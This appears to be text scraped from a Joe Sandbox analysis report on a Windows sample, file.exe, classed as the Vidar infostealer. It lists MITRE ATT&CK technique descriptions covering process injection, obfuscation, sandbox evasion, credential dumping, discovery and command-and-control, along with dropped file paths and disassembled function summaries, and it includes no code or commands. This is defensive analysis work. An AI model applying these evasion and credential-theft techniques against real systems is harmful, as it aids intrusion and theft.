Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\ECGDBFCBKFID\AEBGHD

C:\ProgramData\ECGDBFCBKFID\BAEHIE

C:\ProgramData\ECGDBFCBKFID\CBKFBA

C:\ProgramData\ECGDBFCBKFID\DBGHJE

C:\ProgramData\ECGDBFCBKFID\DGHIDH

C:\ProgramData\ECGDBFCBKFID\GDBFHD

C:\ProgramData\ECGDBFCBKFID\KKEHDB

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_9fe2b44b45cabaf5e9b80eb2becdba8923fcbda_d2f759d2_2d8cec74-354d-460a-95ad-bf7884ef09de\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCA4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD31.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD52.tmp.xml

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
file.exe

Function 0151018D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 00FD9390 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 560
synchronizationthreadCOMMON

Function 00FFA9B2 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 00FD2920 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132
COMMON

Function 00FEDB5C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00FECE30 Relevance: 2.6, APIs: 2, Instructions: 71
COMMONLIBRARYCODE

Function 00FF35B8 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Function 00FEDAFF Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 00FFA66B Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Function 00FD8800 Relevance: 1.4, APIs: 1, Instructions: 151
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre